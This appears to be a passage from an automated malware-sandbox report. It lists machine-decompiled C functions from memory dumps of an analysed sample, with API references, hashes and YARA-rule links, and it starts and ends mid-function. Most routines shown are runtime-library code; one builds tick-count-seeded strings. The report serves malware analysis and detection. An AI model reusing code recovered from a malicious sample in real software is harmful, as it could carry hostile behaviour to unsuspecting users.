				E736DA293( *((intOrPtr*)(_a4 + 0x40)));
				E736DA293( *((intOrPtr*)(_a4 + 0x44)));
				E736DA293( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E736D9995(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E736D99F6(_t67, _t72, _t73, _t77);
			}














                                                                                                                                                                                                                                0x736d9b4d
                                                                                                                                                                                                                                0x736d9b4d
                                                                                                                                                                                                                                0x736d9b4d
                                                                                                                                                                                                                                0x736d9b52
                                                                                                                                                                                                                                0x736d9b58
                                                                                                                                                                                                                                0x736d9b5a
                                                                                                                                                                                                                                0x736d9b60
                                                                                                                                                                                                                                0x736d9b63
                                                                                                                                                                                                                                0x736d9b68
                                                                                                                                                                                                                                0x736d9b6b
                                                                                                                                                                                                                                0x736d9b6f
                                                                                                                                                                                                                                0x736d9b7a
                                                                                                                                                                                                                                0x736d9b85
                                                                                                                                                                                                                                0x736d9b90
                                                                                                                                                                                                                                0x736d9b9b
                                                                                                                                                                                                                                0x736d9ba6
                                                                                                                                                                                                                                0x736d9bb1
                                                                                                                                                                                                                                0x736d9bbc
                                                                                                                                                                                                                                0x736d9bca
                                                                                                                                                                                                                                0x736d9bd5
                                                                                                                                                                                                                                0x736d9bdd
                                                                                                                                                                                                                                0x736d9bde
                                                                                                                                                                                                                                0x736d9be1
                                                                                                                                                                                                                                0x736d9be7
                                                                                                                                                                                                                                0x736d9beb
                                                                                                                                                                                                                                0x736d9bef
                                                                                                                                                                                                                                0x736d9bf0
                                                                                                                                                                                                                                0x736d9bfa
                                                                                                                                                                                                                                0x736d9c00
                                                                                                                                                                                                                                0x736d9c01
                                                                                                                                                                                                                                0x736d9c04
                                                                                                                                                                                                                                0x736d9c0a
                                                                                                                                                                                                                                0x736d9c0e
                                                                                                                                                                                                                                0x736d9c12
                                                                                                                                                                                                                                0x736d9c1b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction ID: ddb1edd4f9ed18cc31756fd0c7bb6d8f5c25aa08bd4ac0d45db7d741bc4a5af1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21DD76D54208AFDF02DF95C940EDE7BB9BF08600F0445A9F5099B260EB76DB54CB84
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A85E8A, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                                                			E00A85E8A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xa8d37c; // 0x1ae9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00A89CCC(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xa8c1ac;
				}
				_t46 = E00A81F9B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00A85157(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xa8d2e0; // 0x105a5a8
						_t16 = _t75 + 0xa8eb10; // 0x530025
						 *0xa8d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00A89CCC(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xa8c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00A85157(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00A853BB(_v20);
						} else {
							_t66 =  *0xa8d2e0; // 0x105a5a8
							_t31 = _t66 + 0xa8ec30; // 0x73006d
							 *0xa8d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00A853BB(_v12);
				}
				return _v24;
			}




























                                                                                                                                                                                                                                0x00a85e92
                                                                                                                                                                                                                                0x00a85e98
                                                                                                                                                                                                                                0x00a85e9f
                                                                                                                                                                                                                                0x00a85ea5
                                                                                                                                                                                                                                0x00a85ea9
                                                                                                                                                                                                                                0x00a85ead
                                                                                                                                                                                                                                0x00a85eb0
                                                                                                                                                                                                                                0x00a85eb5
                                                                                                                                                                                                                                0x00a85eba
                                                                                                                                                                                                                                0x00a85ebc
                                                                                                                                                                                                                                0x00a85ebc
                                                                                                                                                                                                                                0x00a85ec5
                                                                                                                                                                                                                                0x00a85eca
                                                                                                                                                                                                                                0x00a85ecf
                                                                                                                                                                                                                                0x00a85ed5
                                                                                                                                                                                                                                0x00a85edf
                                                                                                                                                                                                                                0x00a85ee8
                                                                                                                                                                                                                                0x00a85eef
                                                                                                                                                                                                                                0x00a85f08
                                                                                                                                                                                                                                0x00a85f0d
                                                                                                                                                                                                                                0x00a85f12
                                                                                                                                                                                                                                0x00a85f1b
                                                                                                                                                                                                                                0x00a85f24
                                                                                                                                                                                                                                0x00a85f35
                                                                                                                                                                                                                                0x00a85f3e
                                                                                                                                                                                                                                0x00a85f42
                                                                                                                                                                                                                                0x00a85f46
                                                                                                                                                                                                                                0x00a85f4b
                                                                                                                                                                                                                                0x00a85f50
                                                                                                                                                                                                                                0x00a85f52
                                                                                                                                                                                                                                0x00a85f52
                                                                                                                                                                                                                                0x00a85f5c
                                                                                                                                                                                                                                0x00a85f65
                                                                                                                                                                                                                                0x00a85f6c
                                                                                                                                                                                                                                0x00a85f84
                                                                                                                                                                                                                                0x00a85f88
                                                                                                                                                                                                                                0x00a85fc5
                                                                                                                                                                                                                                0x00a85f8a
                                                                                                                                                                                                                                0x00a85f8d
                                                                                                                                                                                                                                0x00a85f95
                                                                                                                                                                                                                                0x00a85fa6
                                                                                                                                                                                                                                0x00a85fb2
                                                                                                                                                                                                                                0x00a85fba
                                                                                                                                                                                                                                0x00a85fbe
                                                                                                                                                                                                                                0x00a85fbe
                                                                                                                                                                                                                                0x00a85f88
                                                                                                                                                                                                                                0x00a85fcd
                                                                                                                                                                                                                                0x00a85fd2
                                                                                                                                                                                                                                0x00a85fd9

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A85E9F
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 00A85EDF
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A85EE8
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A85EEF
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000002), ref: 00A85EFC
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000004), ref: 00A85F5C
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A85F65
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A85F6C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00A85F73
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2535036572-0
                                                                                                                                                                                                                                • Opcode ID: 2e168be769711576e901c1e716e03decddd81cabd31fac891d523b300d3a2605
                                                                                                                                                                                                                                • Instruction ID: 0d62b181c728ce96a094de5041c5d35ed29788d3c601a3ec88b57eef34e05db1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e168be769711576e901c1e716e03decddd81cabd31fac891d523b300d3a2605
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F413472D00219EBCF11AFA4CD09A9EBBB5EF44354F054065EE04AB261DB359A11EFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D7B00, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E736D7B00(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t110;

				_t87 = __edx;
				_push(__ebx);
				_t73 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t73 = E736E0D60(__ecx,  *_t73);
				_t74 = _a8;
				_t6 = _t74 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t74 + 8) ^  *0x736eb004;
				E736D7AC0(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x736eb004);
				E736D80A7(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t91 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E736D8090(_t74, 0xfffffffe, _t94, 0x736eb004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t60 = _t91 + (_t91 + 2) * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
							_t61 = _t78 + _t60 * 4;
							_t79 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t62 = E736D8030(_t79, _t94);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E736D7AC0(_t74, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x736e115c;
											if(__eflags != 0) {
												_t69 = E736E0C00(__eflags, 0x736e115c);
												_t103 = _t103 + 4;
												__eflags = _t69;
												if(_t69 != 0) {
													_t98 =  *0x736e115c; // 0x736d7cd5
													 *0x736e1104(_a4, 1);
													 *_t98();
													_t94 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t88 = _t63;
										E736D8070(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
											_t88 = _t91;
											E736D8090(_t65, _t91, _t94, 0x736eb004);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
										_t66 = E736D7AC0(_t74, _t88, _t91, _t94, _v12);
										E736D8050();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t99, _t94);
										__eflags = _t66;
										if(_t66 != 0) {
											_push(_t94);
											do {
												_t96 =  *_t66;
												E736D9721(_t66);
												_t66 = _t96;
												__eflags = _t96;
											} while (_t96 != 0);
											return _t66;
										}
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t91 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}
































                                                                                                                                                                                                                                0x736d7b00
                                                                                                                                                                                                                                0x736d7b06
                                                                                                                                                                                                                                0x736d7b07
                                                                                                                                                                                                                                0x736d7b0b
                                                                                                                                                                                                                                0x736d7b0c
                                                                                                                                                                                                                                0x736d7b12
                                                                                                                                                                                                                                0x736d7b1e
                                                                                                                                                                                                                                0x736d7b20
                                                                                                                                                                                                                                0x736d7b26
                                                                                                                                                                                                                                0x736d7b26
                                                                                                                                                                                                                                0x736d7b2f
                                                                                                                                                                                                                                0x736d7b31
                                                                                                                                                                                                                                0x736d7b34
                                                                                                                                                                                                                                0x736d7b37
                                                                                                                                                                                                                                0x736d7b3f
                                                                                                                                                                                                                                0x736d7b44
                                                                                                                                                                                                                                0x736d7b47
                                                                                                                                                                                                                                0x736d7b4a
                                                                                                                                                                                                                                0x736d7b51
                                                                                                                                                                                                                                0x736d7bad
                                                                                                                                                                                                                                0x736d7bb0
                                                                                                                                                                                                                                0x736d7bb8
                                                                                                                                                                                                                                0x736d7bbf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7bbf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b53
                                                                                                                                                                                                                                0x736d7b53
                                                                                                                                                                                                                                0x736d7b59
                                                                                                                                                                                                                                0x736d7b5f
                                                                                                                                                                                                                                0x736d7b65
                                                                                                                                                                                                                                0x736d7bd0
                                                                                                                                                                                                                                0x736d7bd9
                                                                                                                                                                                                                                0x736d7b67
                                                                                                                                                                                                                                0x736d7b67
                                                                                                                                                                                                                                0x736d7b67
                                                                                                                                                                                                                                0x736d7b6d
                                                                                                                                                                                                                                0x736d7b70
                                                                                                                                                                                                                                0x736d7b73
                                                                                                                                                                                                                                0x736d7b76
                                                                                                                                                                                                                                0x736d7b79
                                                                                                                                                                                                                                0x736d7b7e
                                                                                                                                                                                                                                0x736d7b94
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b80
                                                                                                                                                                                                                                0x736d7b80
                                                                                                                                                                                                                                0x736d7b82
                                                                                                                                                                                                                                0x736d7b87
                                                                                                                                                                                                                                0x736d7b89
                                                                                                                                                                                                                                0x736d7b8c
                                                                                                                                                                                                                                0x736d7b8e
                                                                                                                                                                                                                                0x736d7ba4
                                                                                                                                                                                                                                0x736d7bc4
                                                                                                                                                                                                                                0x736d7bc4
                                                                                                                                                                                                                                0x736d7bc8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7bda
                                                                                                                                                                                                                                0x736d7bdd
                                                                                                                                                                                                                                0x736d7be3
                                                                                                                                                                                                                                0x736d7be5
                                                                                                                                                                                                                                0x736d7bec
                                                                                                                                                                                                                                0x736d7bf3
                                                                                                                                                                                                                                0x736d7bf8
                                                                                                                                                                                                                                0x736d7bfb
                                                                                                                                                                                                                                0x736d7bfd
                                                                                                                                                                                                                                0x736d7bff
                                                                                                                                                                                                                                0x736d7c0c
                                                                                                                                                                                                                                0x736d7c12
                                                                                                                                                                                                                                0x736d7c14
                                                                                                                                                                                                                                0x736d7c17
                                                                                                                                                                                                                                0x736d7c17
                                                                                                                                                                                                                                0x736d7c1a
                                                                                                                                                                                                                                0x736d7c1a
                                                                                                                                                                                                                                0x736d7bec
                                                                                                                                                                                                                                0x736d7c20
                                                                                                                                                                                                                                0x736d7c22
                                                                                                                                                                                                                                0x736d7c27
                                                                                                                                                                                                                                0x736d7c2a
                                                                                                                                                                                                                                0x736d7c2d
                                                                                                                                                                                                                                0x736d7c35
                                                                                                                                                                                                                                0x736d7c39
                                                                                                                                                                                                                                0x736d7c3e
                                                                                                                                                                                                                                0x736d7c3e
                                                                                                                                                                                                                                0x736d7c45
                                                                                                                                                                                                                                0x736d7c48
                                                                                                                                                                                                                                0x736d7c58
                                                                                                                                                                                                                                0x736d7c5d
                                                                                                                                                                                                                                0x736d7c64
                                                                                                                                                                                                                                0x736d7c6a
                                                                                                                                                                                                                                0x736d7c6c
                                                                                                                                                                                                                                0x736d7c6e
                                                                                                                                                                                                                                0x736d7c6f
                                                                                                                                                                                                                                0x736d7c6f
                                                                                                                                                                                                                                0x736d7c72
                                                                                                                                                                                                                                0x736d7c77
                                                                                                                                                                                                                                0x736d7c7a
                                                                                                                                                                                                                                0x736d7c7a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7c7e
                                                                                                                                                                                                                                0x736d7c80
                                                                                                                                                                                                                                0x736d7b92
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b92
                                                                                                                                                                                                                                0x736d7b90
                                                                                                                                                                                                                                0x736d7b8e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7b97
                                                                                                                                                                                                                                0x736d7b97
                                                                                                                                                                                                                                0x736d7b99
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x736d7b65
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7B37
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 736D7B3F
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7BC8
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 736D7BF3
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7C48
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                • Opcode ID: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction ID: 06bcfdb3823eca6632ae82424dedac963ae3f8a898a7b5a53310191a76ef24ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1741A234A10218AFCF00DF69C984B9EBFB5FF45324F148595E81A9B3D1D731AA05CB96
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DB9A8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DB9A8(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x736efa08 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x736e1f08 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E736D9913(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E736D9913(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                                                                                                                                                                                                                0x736db9b1
                                                                                                                                                                                                                                0x736dba5b
                                                                                                                                                                                                                                0x736db9b9
                                                                                                                                                                                                                                0x736db9bb
                                                                                                                                                                                                                                0x736db9c2
                                                                                                                                                                                                                                0x736db9c4
                                                                                                                                                                                                                                0x736db9ca
                                                                                                                                                                                                                                0x736db9d7
                                                                                                                                                                                                                                0x736db9ec
                                                                                                                                                                                                                                0x736db9f0
                                                                                                                                                                                                                                0x736dba42
                                                                                                                                                                                                                                0x736dba42
                                                                                                                                                                                                                                0x736dba47
                                                                                                                                                                                                                                0x736dba4b
                                                                                                                                                                                                                                0x736dba4e
                                                                                                                                                                                                                                0x736dba4e
                                                                                                                                                                                                                                0x736dba54
                                                                                                                                                                                                                                0x736dba56
                                                                                                                                                                                                                                0x736dba6d
                                                                                                                                                                                                                                0x736dba66
                                                                                                                                                                                                                                0x736dba6c
                                                                                                                                                                                                                                0x736dba6c
                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba58
                                                                                                                                                                                                                                0x736db9f2
                                                                                                                                                                                                                                0x736db9fb
                                                                                                                                                                                                                                0x736dba32
                                                                                                                                                                                                                                0x736dba32
                                                                                                                                                                                                                                0x736dba34
                                                                                                                                                                                                                                0x736dba36
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba3e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba3e
                                                                                                                                                                                                                                0x736dba05
                                                                                                                                                                                                                                0x736dba0a
                                                                                                                                                                                                                                0x736dba0f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba19
                                                                                                                                                                                                                                0x736dba1e
                                                                                                                                                                                                                                0x736dba23
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba28
                                                                                                                                                                                                                                0x736dba2e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dba2e
                                                                                                                                                                                                                                0x736db9cf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db9d5
                                                                                                                                                                                                                                0x736dba64
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 0-537541572
                                                                                                                                                                                                                                • Opcode ID: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction ID: bd3f09eb500b2476a93856ba6a92cdf78bda29b44807552fa0e939510c4026fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e8a4125338187a106e6411ffa704b025f84214ed62aa597215d212e889674f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7210B72A51214FBDF129665CD44B5A3BADEB01760F1C0251ED1BAB2C9EBB0DD04C6E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A822AB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                			E00A822AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xa8d2e0; // 0x105a5a8
				_t1 = _t9 + 0xa8e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00A81BB5(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00A85157(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
